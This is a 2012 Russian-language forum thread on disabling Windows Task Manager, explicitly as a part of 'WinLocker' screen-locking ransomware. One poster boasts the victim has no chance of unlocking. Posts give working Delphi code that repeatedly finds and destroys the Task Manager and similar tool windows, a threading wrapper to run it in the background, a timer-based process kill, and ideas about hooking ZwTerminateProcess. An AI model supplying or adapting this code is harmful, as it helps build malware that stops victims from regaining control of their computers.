| 

Блокировка диспетчера задач
				 | 
 | 
| cool1 | Дата: Среда, 04.01.2012, 12:56 | Сообщение # 1 |  

Участник 

Статус: Offline 

| Многие начинающие при написании ну например локера и т.п. задают вопрос - "Как отключить зловещий диспетчер задач"     Способов есть много, ну например всякие таймеры и т.п. Чтобы у вас не возникало вопросов я выложу один из простых способов:   Доступно только для пользователей

За помощь ставьте +!

Сообщение отредактировал dolphin - Четверг, 05.01.2012, 11:38  |  
|   | 
 |    | 
| IgorChekun | Дата: Среда, 04.01.2012, 14:00 | Сообщение # 2 |  

Был не раз 

| Юзвер не сможет открыть Диспетчер, и скачает другую подобную программу)  
 |  
|   | 
 |    | 
| GReIIIHuK | Дата: Среда, 04.01.2012, 17:20 | Сообщение # 3 |  

Участник 

| IgorChekun, Таких людей не видел ниразу     Я подразделяю их на 4 типа:   1) Ламмер - увидет что заблокирован диспетчер, запросит спец. поддержку(ремонтники :3)   2) Юзер - Диспетчер заблокирован, будут просить помощи у друзей или снесет винду(при необходимости)   3) Продвинутый Юзверь - Разблокирует его сам.   4) Программист - Разблокирует его, узнает кто это сделал, заблокирует его винду к чертям  
  Skype:"greiiihuk."           Да, я преступник. Мое преступление — любопытство.   Быть может умру я, умрут многие, но идея останется жить навсегда.   Я работаю не только за спасибо.(+) ©
 |  
|   | 
 |    | 
| IgorChekun | Дата: Среда, 04.01.2012, 23:43 | Сообщение # 4 |  

Был не раз 

| А я на 3 группы:   1. Одни просто забьют, контра\ВОВ важнее)   2. Позвонит\спросит у друга)   3. Будут копаться сами до последнего)
 |  
|   | 
 |    | 
| cool1 | Дата: Четверг, 05.01.2012, 09:11 | Сообщение # 5 |  

Участник 

| *-* Это вариант для WinLockera.   Так что при использовании этого кода в винлокере, шансов на разблокировку 0!    

За помощь ставьте +!
 |  
|   | 
 |    | 
| GReIIIHuK | Дата: Четверг, 05.01.2012, 18:02 | Сообщение # 6 |  

Участник 

| А по мне этот код лучше, сейчас поймешь почему:   Доступно только для пользователей
  Skype:"greiiihuk."           Да, я преступник. Мое преступление — любопытство.   Быть может умру я, умрут многие, но идея останется жить навсегда.   Я работаю не только за спасибо.(+) ©

Сообщение отредактировал GReIIIHuK - Четверг, 05.01.2012, 19:01  |  
|   | 
 |    | 
| cool1 | Дата: Понедельник, 09.01.2012, 09:54 | Сообщение # 7 |  

Участник 

| Вот еще аналог нашел:   Code procedure AntiTaskMgr();   const WinName : array [1..3] of string = ('Диспетчер задач Windows', 'AnVir Task Manager', 'PROWiSe Manager');   var   FU:HWND;   i:integer;   begin   while true do     begin     for i:=1 to 3 do      begin      FU := FindWindow(nil, PChar(WinName[i]));      if FU <> 0 then       SendMessage(FU, WM_DESTROY, 0, 0);      end;     Sleep(300);     end;   end;     

За помощь ставьте +!

Сообщение отредактировал cool1 - Понедельник, 09.01.2012, 12:57  |  
|   | 
 |    | 
| Волк-1024 | Дата: Среда, 11.01.2012, 00:06 | Сообщение # 8 |  

Авторитетный 

| Такое нужно делать в отдельном потоке. Иначе зависнет прога. 
   Как-то так: 
   Code    var      ThID: DWORD;   begin   BeginThread(nil, 0, @AntiTaskMgr, nil, 0, ThID);     
  Pascal, C\C++, Assembler, Python

Сообщение отредактировал Волк-1024 - Среда, 11.01.2012, 14:40  |  
|   | 
 |    | 
| GReIIIHuK | Дата: Пятница, 13.01.2012, 12:06 | Сообщение # 9 |  

Участник 

| Quote (cool1) Так же вы можете использовать таймер) Поставив интервал 1, и прописав в обработчике "OnTimer" -   KillTask('taskmgr.exe');        Не, это самый "плохой" способ. Я так же сделал, и все равно смог закрыть процесс))   Зажимаем Ctrl+alt+del и держим,он успевает появится на милисекунду, нам этого достаточно чтобы успеть кликнуть. Тк состояние диспетчера по вкладкам не меняется, спокойненько переходим во вкладку процессы, ищем, и закрываем     Помню случ. Запустил WinLock с случ. паролем))) И блок. Диспетчера была именно такая. Выкрутился.
 |  
|   | 
 |    | 
| vvova15 | Дата: Воскресенье, 15.01.2012, 16:28 | Сообщение # 10 |  

Участник 

| Quote (cool1) Так что при использовании этого кода в винлокере, шансов на разблокировку 0!      я напишу свой диспетчер с помощью ToolHelp и обломаю все ваши блокировки     серьезно помешать можно только перхватив функции ZwTerminateProcess,ZwWriteProcessMemory и др.   поищите по форуму - я где-то выкладывал исходник(правда исходников самого драйвера автор исходника не выложил в публичный доступ)

ICQ 185-398
 |  
|   | 
 |    | 
| C@T | Дата: Воскресенье, 15.01.2012, 17:58 | Сообщение # 11 |  

Авторитетный 

| и то от хуков ZwTerminateProcess и ZwWriteProcessMemory можно избавится, открыть файл ntdll.dll , сравнить начало функций , если они отличаются то функцию похукали и восстановить оригинал  

|  
|   | 
 |    | 
| oke | Дата: Воскресенье, 15.01.2012, 21:27 | Сообщение # 12 |  

Постоянный 

| Quote (C@T) и то от хуков ZwTerminateProcess и ZwWriteProcessMemory можно избавится, открыть файл ntdll.dll , сравнить начало функций , если они отличаются то функцию похукали и восстановить оригинал      мало кто до этого додумается
 |  
|   | 
 |    |